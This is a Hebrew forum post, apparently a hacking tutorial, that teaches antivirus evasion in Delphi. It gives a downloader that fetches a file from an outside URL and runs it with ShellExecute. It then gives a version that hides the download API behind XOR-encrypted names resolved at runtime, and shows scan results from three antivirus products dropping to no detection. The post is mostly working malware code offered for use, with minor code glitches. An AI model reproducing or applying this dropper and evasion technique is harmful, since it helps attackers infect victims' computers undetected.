מדריך| API crypting מאמר כולל.
היי אטררף..
מדריך זה נכתב לשפה Delphi , אך בעזרת טיפת יצירתיות תוכלו לגלות איך להשתמש בו במספר נרחב של שפוץ
זוהי השיטה ה 3 והמסכמת אשר תוריד כל אנטיוירוס לרגלכם , תוכלו להתגבר על כל תוכנות ספייוור כל אנטיוירוס כל צייד טרואיינים פשוט הכל תוך זמן קצר , השיטה המנפלאה הזו עובדת ב 100% עם תוצאות מוכחות !
כיום המון אנטיוירוסים (כולם חחח =] ) מבוססים על בסיס שנקרא בסיס אוריסטי. (עזר גילוי)
הבסיס האוריסטי הוא מנוע ענק הכולל בתוכו חותמות ובסיסים מוצפנים ב Hexdecimal , Xor Crypt .
חותמת היא רצף של פעולות אשר נראות חשודות.
כיצד האנטיוירוסים מגלים את הקובץ שלנו על ידי השיטה האוריסטית?
כידוע לנו API היא מעין פקודה קבועה של השפה והיא מתפרשת כ המון פקודות אשר לוכדו על מנת ליצור קלילות.
למשל : ה API המריץ shellexecute כולל בתוכו מגוון של משתנים אשר לא נראים לעיין על ידי המקמפל מכיוון שהשפה כבר עושה הכל עבורנו כדי לחסוך זמן תיכנות , אך אם ניכנס לניבכי הפונקציה נוכל לראות רצף מרשים של הגדרות :
פקודה במצב פגיעה לסאן אוריסטי :
ShellExecute
פקודה מוגנת מסקאן הוריסטי :
TMyProc = function(Caller: I******nown; URL: PChar; FileName: PChar; Reserved: DWORD;LPBINDSTATUSCALLBACK: pointer): HResult; stdcall;
את הפקודה פירקנו למריכיבים שלה , אשר קובעים שם קובץ קריאה וכד'.
כאשר תכתבו פקודה אחר האנטיוירוס האוריסטי לא יגלה את הקובץ אבל כאשר הוא יזהה מניע סדוני כמו קריאה לפנוקצייה של הורדה (UrlDownloadToFile)
הוא מריח משהו חשוד והוא מטביע עליו חותמת , לכן את הרצף של הפעולות הוא יזהה כבעלי מניע סדוני.
הבא נכתוב קוד פגיע לדוגמא :
קוד:
program Project2;
{$APPTYPE CONSOLE}
uses
URLMon,windows,
ShellApi,
SysUtils;
begin
UrlDownloadToFile(nil, PChar('http://fahde..fr/bug/rel/ICrypt%201.0.rar'), PChar('C:\ICrypt.rar'), 0, nil) ;
ShellExecute(0,'open',PChar('C:\ICrypt.rar'),nil,n il,SW_SHOW);
end.
האנטיוירוס האוריסטי מזהה רצף חשוד של פעילויות
UrlDownloadToFile(nil, PChar('http://fahde..fr/bug/rel/ICrypt%201.0.rar'), PChar('C:\ICrypt.rar'), 0, nil) ;
ShellExecute(0,'open',PChar('C:\ICrypt.rar'),nil,n il,SW_SHOW);
הוא מזהה שהתוכנה שלנו מורידה קובץ למחשב ומפעילה אותו.
הוא מייד יזהה שהקובץ נגוע ב Downloader.
כעת נפשט כל פונקצייה
כדי להסתיר את ה downloader הקטן שלנו מאנטיוירוסים אנחנו נפשט כל פונקצייה וניצור קרייפטולוגיה משלנו.
אשר יפריד כל ביט בתוכנה ויהפוך אותו למפושט ומוסתר.
אחרי הקרייפטולוגיה :
קוד:
program Project2;
{$APPTYPE CONSOLE}
//writte by ohad21 (Exploit)
uses
windows,messages,dialogs,
ShellApi,
SysUtils;
type
TMyProc = function(Caller: I******nown; URL: PChar; FileName: PChar; Reserved: DWORD;LPBINDSTATUSCALLBACK: pointer): HResult; stdcall;
function Decrypt(Str : String; Key: string): String;
var
Y, Z : Integer;//writte by ohad21 (Exploit)
B : Byte;
begin
Z := 1;
for Y := 1 to Length(Str) do
begin
B := (ord(Str[Y]) and $0f) xor (ord(Key[Z]) and $0f);
B := b xor 10 ;
Str[Y] := char((ord(Str[Y]) and $f0) + B);
Inc(Z);
If Z > length(Key) then Z := 1;//writte by ohad21 (Exploit)
end;
Result := Str;
end;
var
Handle: THandle;//writte by ohad21 (Exploit)
Maproc: TMyProc;
crypte,decrypte : string;
begin
Decrypte := Decrypt(']ZDLgfdgil\gNadmI' ,'2');
showmessage(Decrypte);//writte by ohad21 (Exploit)
Handle := loadlibrary('Urlmon.dll');
if Handle <> 0 then
begin
try
@Maproc := GetProcAddress(Handle, pchar(Decrypt(']ZDLgfdgil\gNadmI' ,'2')));
if @Maproc<> nil then
begin
Maproc(nil,'http://fahde..fr/bug/rel/ICrypt%201.0.rar','C:\ICrypt.rar',0, nil);//writte by ohad21 (Exploit)
ShellExecute(Handle,'open',PChar('C:\ICrypt.rar'), nil,nil,SW_SHOW);
end;
Library(Handle);
end;
end
end.
עת הבא נצפה בתוצאות :
לפני הצפנת API :
Ikarus: Trojan-Downloader.Win32.Banload.BQ
Bit defender: BehavesLike:Trojan.Downloader
NOD32: NewHeur_PE probably ******nown virus
אחרי הצפנת API :
Ikarus: No virus found in memory
Bit defender: No virus found in memory
NOD32 : No virus found in memory
קרדיט לאתר אחר
נ.ב.פירסמתי נושא מקודם על הנושא הזה , אז חשבתי לפרסם אותו שבילכם ,
ציטוט ההודעה
